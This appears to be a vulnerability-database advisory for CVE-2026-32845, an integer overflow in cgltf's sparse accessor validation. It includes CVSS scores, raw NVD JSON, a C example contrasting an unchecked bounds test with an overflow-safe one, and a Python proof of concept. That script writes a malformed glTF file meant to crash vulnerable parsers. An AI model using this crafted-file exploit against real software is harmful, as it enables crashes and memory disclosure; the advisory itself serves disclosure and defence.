Security Vulnerability Report
CVE-2026-32845 CVSS 8.4 HIGH

CVE-2026-32845

Published: 2026-03-23 16:16:49
Last Modified: 2026-05-01 15:21:32

Description

cgltf version 1.15 and prior contain an integer overflow vulnerability in the cgltf_validate() function when validating sparse accessors that allows attackers to trigger out-of-bounds reads by supplying crafted glTF/GLB input files with attacker-controlled size values. Attackers can exploit unchecked arithmetic operations in sparse accessor validation to cause heap buffer over-reads in cgltf_calc_index_bound(), resulting in denial of service crashes and potential memory disclosure.
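The class of bug described above, a bounds check whose own arithmetic wraps (CWE-190), shown next to an overflow-safe form. This is an added example, not cgltf's code: the `sparse_desc` struct, the function names and the sample values are hypothetical and constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical, simplified sparse accessor; these are not cgltf's structs. */
typedef struct {
    size_t count;            /* sparse.count, taken from the file (untrusted) */
    size_t indices_offset;   /* sparse.indices.byteOffset (untrusted) */
    size_t index_size;       /* bytes per index, derived from componentType */
    size_t indices_view_len; /* byteLength of the indices bufferView */
    size_t values_offset;    /* sparse.values.byteOffset (untrusted) */
    size_t value_size;       /* bytes per value element */
    size_t values_view_len;  /* byteLength of the values bufferView */
} sparse_desc;

/* Naive check: the product and the sum both wrap modulo SIZE_MAX + 1. */
static int fits_unchecked(size_t view_len, size_t off, size_t count, size_t elem) {
    return off + count * elem <= view_len;
}

/* Safe check: only subtracts and divides values already known to be in range. */
static int fits_checked(size_t view_len, size_t off, size_t count, size_t elem) {
    if (elem == 0 || off > view_len) return 0;
    return count <= (view_len - off) / elem;
}

static int sparse_valid_unchecked(const sparse_desc *s) {
    return fits_unchecked(s->indices_view_len, s->indices_offset, s->count, s->index_size)
        && fits_unchecked(s->values_view_len, s->values_offset, s->count, s->value_size);
}

static int sparse_valid_checked(const sparse_desc *s) {
    return fits_checked(s->indices_view_len, s->indices_offset, s->count, s->index_size)
        && fits_checked(s->values_view_len, s->values_offset, s->count, s->value_size);
}

/* Constructed sample: count * 2 wraps to 2, so 20-byte views look big enough. */
static sparse_desc wrapping_sample(void) {
    sparse_desc s = { SIZE_MAX / 2 + 2, 0, 2, 20, 0, 2, 20 };
    return s;
}

int main(void) {
    sparse_desc s = wrapping_sample();
    printf("unchecked accepts: %d\n", sparse_valid_unchecked(&s));
    printf("checked accepts:   %d\n", sparse_valid_checked(&s));
    return 0;
}
```

The safe form never multiplies untrusted values; it compares the element count against the number of elements that fit in the remaining bytes of the view.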

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

cgltf <= 1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json

# This script generates a malformed glTF JSON structure to trigger the integer overflow.
# The vulnerability exists in cgltf_validate() when checking sparse accessors.

# Construct a minimal glTF structure with a sparse accessor
# containing attacker-controlled size values designed to overflow.
poc_data = {
    "asset": {"version": "2.0"},
    "meshes": [{
        "primitives": [{
            "attributes": {"POSITION": 0},
            "indices": 0
        }]
    }],
    "accessors": [{
        "bufferView": 0,
        "componentType": 5123,  # UNSIGNED_SHORT
        "count": 10,
        "type": "SCALAR",
        "sparse": {
            "count": 4294967294,  # Large value to trigger overflow
            "indices": {
                "bufferView": 0,
                "byteOffset": 0,
                "componentType": 5123
            },
            "values": {
                "bufferView": 0,
                "byteOffset": 0
            }
        }
    }],
    "bufferViews": [{
        "buffer": 0,
        "byteLength": 20
    }],
    "buffers": [{
        "byteLength": 20,
        "uri": "data:application/octet-stream;base64,AAAAAAAAAAAAAAAA"
    }]
}

# Save to file
with open("malformed.gltf", "w") as f:
    json.dump(poc_data, f)

print("Malformed glTF file generated: malformed.gltf")
# Load this file using a vulnerable version of cgltf to trigger the crash.
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32845", "sourceIdentifier": "[email protected]", "published": "2026-03-23T16:16:48.583", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "cgltf version 1.15 and prior contain an integer overflow vulnerability in the cgltf_validate() function when validating sparse accessors that allows attackers to trigger out-of-bounds reads by supplying crafted glTF/GLB input files with attacker-controlled size values. Attackers can exploit unchecked arithmetic operations in sparse accessor validation to cause heap buffer over-reads in cgltf_calc_index_bound(), resulting in denial of service crashes and potential memory disclosure."}, {"lang": "es", "value": "La versión 1.15 y anteriores de cgltf contienen una vulnerabilidad de desbordamiento de entero en la función cgltf_validate() al validar accesores dispersos que permite a los atacantes provocar lecturas fuera de límites al proporcionar archivos de entrada glTF/GLB manipulados con valores de tamaño controlados por el atacante. 
Los atacantes pueden explotar operaciones aritméticas no verificadas en la validación de accesores dispersos para causar sobrelecturas de búfer de pila en cgltf_calc_index_bound(), lo que resulta en caídas por denegación de servicio y posible divulgación de memoria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/jkuhlmann/cgltf/issues/287", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jkuhlmann-cgltf-sparse-accessor-validation-integer-overflow", "source": "[email protected]"}, {"url": "https://github.com/jkuhlmann/cgltf/issues/287", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}